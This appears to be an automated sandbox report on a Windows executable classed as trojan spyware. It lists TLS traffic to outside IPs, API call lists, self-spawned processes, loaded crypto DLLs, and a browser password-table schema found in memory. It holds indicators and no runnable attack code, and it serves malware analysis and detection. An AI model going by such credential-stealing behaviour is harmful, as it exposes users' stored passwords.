            Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.6:49869 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49875 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49964 version: TLS 1.2
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_72ED1B5F0_2_72ED1B5F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_00404DCC3_2_00404DCC
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_00406AF23_2_00406AF2
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_001543283_2_00154328
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_001590483_2_00159048
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_00155F903_2_00155F90
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_00152DD13_2_00152DD1
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_338703AF3_2_338703AF
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_338753FC3_2_338753FC
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387331A3_2_3387331A
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_338776283_2_33877628
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387C6383_2_3387C638
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387F6493_2_3387F649
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387CCA03_2_3387CCA0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387EBF73_2_3387EBF7
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_33876B013_2_33876B01
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387E3393_2_3387E339
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387DA893_2_3387DA89
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_33876ADF3_2_33876ADF
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387C1F23_2_3387C1F2
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387B9443_2_3387B944
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387F0423_2_3387F042
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_338778483_2_33877848
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387B07F3_2_3387B07F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387E79F3_2_3387E79F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_33876E913_2_33876E91
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_33876EA03_2_33876EA0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387DEE13_2_3387DEE1
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_33877EF83_2_33877EF8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387BD883_2_3387BD88
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387CC913_2_3387CC91
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387B4EC3_2_3387B4EC
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFBDF03_2_35AFBDF0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF9D103_2_35AF9D10
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF14003_2_35AF1400
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF96C83_2_35AF96C8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF86503_2_35AF8650
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFA9B03_2_35AFA9B0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFA3603_2_35AFA360
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF4DA03_2_35AF4DA0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF4DB03_2_35AF4DB0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFBDE13_2_35AFBDE1
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF9D003_2_35AF9D00
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF25603_2_35AF2560
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF25503_2_35AF2550
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF1CA03_2_35AF1CA0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF74B83_2_35AF74B8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF1CB03_2_35AF1CB0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF74C83_2_35AF74C8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF6C183_2_35AF6C18
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF0FA83_2_35AF0FA8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF67B03_2_35AF67B0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFAFE83_2_35AFAFE8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFAFF83_2_35AFAFF8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFAFF73_2_35AFAFF7
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF67C03_2_35AF67C0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF5F103_2_35AF5F10
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF3F603_2_35AF3F60
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF3F703_2_35AF3F70
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF96B83_2_35AF96B8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF36B03_2_35AF36B0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF36C03_2_35AF36C0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF2E103_2_35AF2E10
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF56603_2_35AF5660
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF86403_2_35AF8640
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF56503_2_35AF5650
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF29A83_2_35AF29A8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFA9A03_2_35AFA9A0
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF29B83_2_35AF29B8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFF1203_2_35AFF120
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFF1303_2_35AFF130
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF21083_2_35AF2108
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF48203_2_35AF4820
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF48103_2_35AF4810
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF70613_2_35AF7061
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF70703_2_35AF7070
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF00403_2_35AF0040
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF18583_2_35AF1858
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF43B93_2_35AF43B9
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF43C83_2_35AF43C8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF3B083_2_35AF3B08
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF3B183_2_35AF3B18
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF63683_2_35AF6368
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF7B4F3_2_35AF7B4F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF63583_2_35AF6358
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFA3513_2_35AFA351
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF5AA83_2_35AF5AA8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF5AB83_2_35AF5AB8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AFBA973_2_35AFBA97
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF52083_2_35AF5208
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF52073_2_35AF5207
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_35AF32683_2_35AF3268
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3627D6083_2_3627D608
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3627E7C83_2_3627E7C8
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3627E7BA3_2_3627E7BA
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_362783283_2_36278328
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: String function: 00402C41 appears 51 times
            Source: b5BQbAhwVD.exe, 00000000.00000000.2108871344.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs b5BQbAhwVD.exe
            Source: b5BQbAhwVD.exe, 00000003.00000000.2376942007.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs b5BQbAhwVD.exe
            Source: b5BQbAhwVD.exe, 00000003.00000002.3385761842.00000000336F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs b5BQbAhwVD.exe
            Source: b5BQbAhwVD.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs b5BQbAhwVD.exe
            Source: b5BQbAhwVD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@7/6
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeMutant created: NULL
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeFile created: C:\Users\user\AppData\Local\Temp\nss447E.tmpJump to behavior
            Source: b5BQbAhwVD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: b5BQbAhwVD.exe, 00000003.00000002.3388123830.00000000348BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: b5BQbAhwVD.exeVirustotal: Detection: 76%
            Source: b5BQbAhwVD.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeFile read: C:\Users\user\Desktop\b5BQbAhwVD.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\b5BQbAhwVD.exe "C:\Users\user\Desktop\b5BQbAhwVD.exe"
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess created: C:\Users\user\Desktop\b5BQbAhwVD.exe "C:\Users\user\Desktop\b5BQbAhwVD.exe"
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess created: C:\Users\user\Desktop\b5BQbAhwVD.exe "C:\Users\user\Desktop\b5BQbAhwVD.exe"Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: ncryptsslp.dllJump to behavior
